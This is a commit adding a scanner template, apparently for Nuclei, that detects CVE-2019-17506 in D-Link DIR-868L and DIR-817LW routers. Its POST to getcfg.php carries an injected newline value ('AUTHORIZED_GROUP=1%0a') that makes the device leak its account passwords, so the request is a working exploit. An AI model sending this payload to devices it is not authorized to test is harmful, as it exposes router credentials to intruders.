Create CVE-2019-17506.yaml

cves/2019/CVE-2019-17506.yaml

@@ -0,0 +1,27 @@
+id: CVE-2019-17506
+
+info:
+  name: Dlink DIR-868L & DIR-817LW Info Leak
+  author: pikpikcu
+  severity: info
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17506
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/getcfg.php"
+    body: |
+        SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
+    headers:
+      Content-Type: text/xml
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "</password>"
+          - "DEVICE.ACCOUNT"
+        part: body